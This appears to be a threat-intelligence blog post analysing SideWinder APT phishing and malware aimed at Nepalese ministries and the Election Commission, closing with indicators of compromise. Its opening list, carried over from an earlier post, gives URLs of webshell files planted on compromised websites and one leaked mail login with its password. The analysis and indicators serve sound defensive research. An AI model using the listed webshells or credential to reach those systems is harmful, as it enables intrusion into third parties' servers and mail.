dasgpi[.]edu[.]bd
polresku[.]id
app.sycamoreschool[.]com

61.19.251.44
231.100.76.32
37.59.28.24
45.64.1.58
43.250.250.62
50.87.249.80
79.124.76.95
95.142.80.3
103.15.226.230
103.247.11.50
104.20.155.77
104.238.117.234
108.167.180.222
162.241.230.74
162.241.217.60
186.202.153.58
173.236.169.164
182.70.240.119
192.95.11.64
192.163.208.222
132.148.154.122
205.178.189.131
202.70.136.137
204.197.252.169
217.182.113.29

Compromised Websites Shared By the Group:
countdown-showband[.]de//images/jsspwneed.png
http://www.adslaminar[.]com//images/jdownloads/screenshots/jsspwned.png
http://www.psp2.radom[.]pl//images/jdownloads/screenshots/jsspwned.png
http://www.argonrostov[.]ru//images/jsspwneed.php
http://www.oplus-conseil[.]fr//images/jsspwneed.php
http://china.lanfa.com[.]tw//images/jsspwneed.php
http://www.emgiasa[.]es//images/jsspwneed.php
http://www.oplus-conseil[.]fr//images/jsspwneed.php
http://china.lanfa.com[.]tw//images/jsspwneed.php
http://www.emgiasa[.]es//images/jsspwneed.php
http://www.gammi-ltd[.]ru//images/jsspwneed.php
http://focusmobi.com[.]br//wp-content/plugins/revslider/temp/update_extract/revslider/jsspwned.php
http://syaden[.]net//images/jdownloads/screenshots/jsspwned.png
http://vanguardacademy-ng[.]com//sites/default/files/jsspwnx.php
mail.kingacreative[.]com|info@kingacreative.com|123123
http://www.aytobareyo[.]org/sites/default/files/jsspwnx.php
http://www.technikus[.]pl//images/jsspwneed.php
http://devsaad[.]com/sites/default/files/jsspwnx.php
http://certusprocess[.]com//images/jsspwned.php
http://www.limontech[.]pl//images/jsspwneed.php
http://gemilangasia[.]com//wp-content/plugins/revslider/temp/update_extract/revslider/jsspwned.php
http://www.colegioserecrescer.com.br//wp-content/plugins/cherry-plugin/admin/import-export/jsspwned.php
http://www.jardimexpress.com[.]br//wp-content/plugins/cherry-plugin/admin/import-export/jsspwned.php
http://vykopatkolodec[.]ru//wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php
*Currently unconfirmed if being used by the group.

↧

Renewed SideWinder Activity in South Asia

March 8, 2021, 8:40 am

≪ Previous: Indonesian Spam Communities

A few months ago, Trend Micro released a post which encapsulated the SideWinder APT group activity in the past year, showcasing SideWinder’s mobile malware development aspirations and spear phishing campaigns targeting the government and military of Nepal, the government of Afghanistan, the Myanma Posts and Telecommunications state owned company, the Chinese Ministry of Foreign Affairs, and several other entities.

The SideWinder APT which is also tracked as RAZOR TIGER, APT-C-17, and Rattlesnake is known to pick its targets in the South Asia region in multiple previous campaigns [1, 2, 3]. SideWinder’s targets mainly consist of the countries of Nepal, Pakistan, Afghanistan, and China along with some other target countries from the group’s known past activity. This threat group is somewhat believed to be associated with Indian interests and seems to mainly choose to target government and military entities in its espionage attacks.

While we were hunting through world scan data provided by BinaryEdge, we encountered an interesting server during our research which was hosting an executable file that led us on a path to uncover a renewed set of activity being conducted by the SideWinder group - picking right where they left off from in their previous year of operation.

Key Findings:

The group renewed its spear phishing activity with new domains registered targeting government entities in Nepal.
Nepal recently cancelled its upcoming elections scheduled for 30 April and 10 May 2021.
Uncovered evidence of the group likely targeting Nepal's Election Commission.
Evidence of continued efforts of malware development being conducted by the group.

Command and Control

The server which was the initial point in our investigation was hosting the following shellcode we identified in the scan response we checked on port 8087.

Server's raw response showing an expected C2 domain connection.

Outputting this raw data for initial analysis and triage, we managed to figure out this was most likely 2nd stage malware being used for Command and Control purposes through this server.

PE-Studio showing us the malware's used libraries, headers, references, and compilation date.

And as we continued our search throughout the server, we realized that it was also communicating with what looked to be 1st stage malware via port 8085. We think that such 1st stage malware is being used in SideWinder’s spear phishing attacks, and we suspect that a sample of one was uploaded in January to VirusTotal.

Upon further search, we managed to find the 2nd stage payload that was being used by the group and hosted on this server via a simple text file encoded in Base64. After a straightforward decode, we were able to see the code used by the threat actor for the 2nd stage payload they are utilizing.

Meterpreter 2nd Stage Payload code excerpt.

We immediately had our assumption verified, as we were able to see that the server is being used for command and control purposes using a meterpreter based payload written in Python.

First Stage Payload

An example of what we suspect this group is using that precedes the command and control infrastructure we first laid eyes on was this malware file uploaded to VirusTotal:

An .hta file most likely attached to spear phishing emails.

We suspect that this actor is using malicious .hta files that are attached to emails containing links to decoy document lures along with embedded 1st stage malware inside the hta files. Here we see such an embedded link to a PE-file being disguised as a txt file being used to deploy spyware upon execution.

Once this spyware is downloaded the malware will check for the environment it’s running in and attempt to identify the infected machine’s IP address with an external HTTP request.

External request to an online IP check API.

Another Python based malware, this specific sample runs in the background after execution and creates a database file of extracted logins from browser files, creates archived files of all of the infected machine's downloads, documents, and desktop files to a then daunting task of exfiltration.

Utilizing the WriteFile function to write the stolen data to files.

Immediately after execution the malware attempts to steal files, writing the stolen browser data to a "Loginvault.db" file and .zip files using the folder location, the machine's IP address and datestamp as the naming scheme.

Exfiltration attempt to the C2 server using port 8080.

This spyware sample takes us directly to the spear phishing efforts we suspect SideWinder may be conducting while using similar malware techniques.

Spear Phishing

Another finding that we encountered while searching through the contents and configurations of this server were the decoy pages SideWinder is using to phish against their intended targets. When we looked at what was being hosted we were surprised to find the server as a single staging point for a lot of the group’s phishing activity (on top of some mobile malware development efforts we cover further along in the post).

The server we were investigating was using various dynamic DNS resolutions to the main IP address and resolving almost all of the domain names with naming schemes that mimic the naming convention of the real entities SideWinder are targeting.

SideWinder are still very adamant at focusing their attention on the same entities they’ve previously attempted to target as showcased by Trend Micro’s report, while adding some additional in-country organizations to their target list.

As of the last few weeks, it seems this group has renewed its activity and started to ramp up attack efforts against their targets of choice. For example, through our investigation of the server, we’ve managed to find that the group is renewing their efforts against government entities of Nepal and setting up phishing infrastructure to launch such campaigns.

In our findings, it seems that SideWinder has added the Ministry of Physical Infrastructure and Transport of Nepal to their list of targets and are still actively trying to gain access to other government offices of the country.

Ministry of Physical Infrastructure and Transport of Nepal domain and login panel.

Another such target in Nepal is the Ministry of Foreign Affairs with a preceding lure intended on motivating the recipient to login with their credentials to be able to continue reading the decoy article planted by the threat actor. In this case, a press release by the Nepal Mission to the UN pertaining to the COVID-19 situation around the region, and human rights issues.

Ministry of Foreign Affairs decoy lure.

A short while after accessing the link the unsuspecting reader will be redirected to the Ministry’s login page.

After a redirect from the lure article, the reader is redirected to this login panel.

Here CapTipper is showcasing us the ~15 seconds it takes to get redirected from the initial decoy article to the login panel.

The phishing efforts being conducted by the group in this activity are reliant on the content delivery backbone of the actual target website to deliver all of the page's media and redirect to it once credentials are entered. Meaning the actor controlled server just hosts basic phishing kits which use the target's own content delivery network to mimic the respective login panel which they are targeting.

The fake page making lookup requests to the real Nepal Foreign Affairs government website.

Some other decoy tricks that are being employed by the group in this campaign are error messages hardcoded in the phishing pages. Such as the one in a phishing page spoofing the Nepal central government email system:

Source code showing the hardcoded error message.

Or an additional one hardcoded in the phishing page targeting the Ministry of Defense:

Ministry of Defense login panel with a hardcoded error.

We imagine this is a social engineering tactic employed by the actor in efforts of achieving further enticement to enter login credentials by adding pretext to complete the action.

We have also witnessed renewed attention in efforts against organizations such as the Nepal state owned Nepal Telecom company, while continuing the techniques of utilizing the real website’s content backbone including the reCaptcha widget.

Nepal Telecom phishing page piggybacking the reCaptcha widget.

As you can see, the SideWinder group is still very interested in targeting entities located in Nepal. With an additionally very interesting phishing page we managed to find being hosted on this server to what we think is also a current and new target focus for the group.

This new phishing target seems to be the Election Commission of Nepal:

A phishing page targeting the Election Commission of Nepal

As we've shown previously, the actor is again utilizing the same tactic of loading the content from the real government website and redirecting to it once credentials are entered:

This finding is particularly interesting considering the fact that Nepal was meant to be having elections fast approaching in April and May of this year, only to be very recently overturned as of last week.

Considering that these elections were only recently announced in the end of December 2020, we think that this proves as to some of the motivation behind the group’s renewed activity and new target focus as of the past couple of months.

Conclusion

There were a few other findings we gathered from this server which we decided not to blog about in this post as we didn't consider them much different from the phase of operations this group was at at the end of last year. Like some which were connected to the mobile malware applications being developed by SideWinder, as this part of their operations seems to be still very much in the development and testing stage. As evident by what looks like internal testing left behind by the developers.

Log left behind by the group.

We also can’t confirm that all of the phishing infrastructure we uncovered will indeed be infected with malware or have a preceding malicious payload once in use. Even with the proximity of the phishing pages residing on the same server with other malware it remains unclear at this stage. Some of these pages may very well be used in single purpose credential phishing campaigns.

On the other hand, what we did cover in this post indicates how SideWinder is very much focused on conducting espionage operations against their target area of interest in South Asia. Taking into account what this group has done in the past year; we see that we should take this renewed activity as an indication that SideWinder will only continue to ramp up its activities in the rest of the upcoming months of 2021 and beyond.

The group’s continued interest in Nepal serves as evidence to that – We can only speculate that regional developments such as the potential elections in countries of the region, geopolitical tensions such as the military clashes in the India-China border, international events mixed in with regional efforts such as COVID-19 vaccine distribution, and other regional interests will only continue to fuel such campaigns conducted by the group in South Asia. We should anticipate more of such spear phishing activity and further development of their malware and specific mobile malware capabilities to launch such campaigns against the group’s targets of interest.

Indicators of Compromise

mail-ntcnetnp.serveftp[.]com
mail.aop.gavaf[.]org
mail.nepal.gavnp[.]org
mail.ncp.gavnp[.]org
mail-mofa.hopto[.]org
mail-mofagovpk.myftp[.]org
mail-mopitgovnp.hopto[.]org
webmail-accbt.hopto[.]org
mail-opmcmgavnp.hopto[.]org
mail-nepalpolgavnp.hopto[.]org
mail-apfgavnp.hopto[.]org
mail-meagovmv.hopto[.]org

microsoft-winupdate.servehttp[.]com
changeworld.hopto[.]org
teamchat.hopto[.]org

45.153.240[.]66

680196722f65117a62cb3738f390e3552ffafcd663e85b7a81965f55462be994
0c182b51ff1dffaa384651e478155632c6e65820322774e416be20e6d49bb8f9
66dcaaa42e3f36f0560af741017c13c528758140f0f7f4260b9213739ffd9e70
ddc19d1421e2eed9c606c4249fab0662f1253e441da2f1285242cb03d5be5b32
f120cb306cb9e2cc0fbfb47e6bd4fdf2a3eea0447a933bc922f33ff458b43a86
fd48c8ae2753bb729ed26535726459f6c19e598fd270eaaa5c14f4d51ce348d5

↧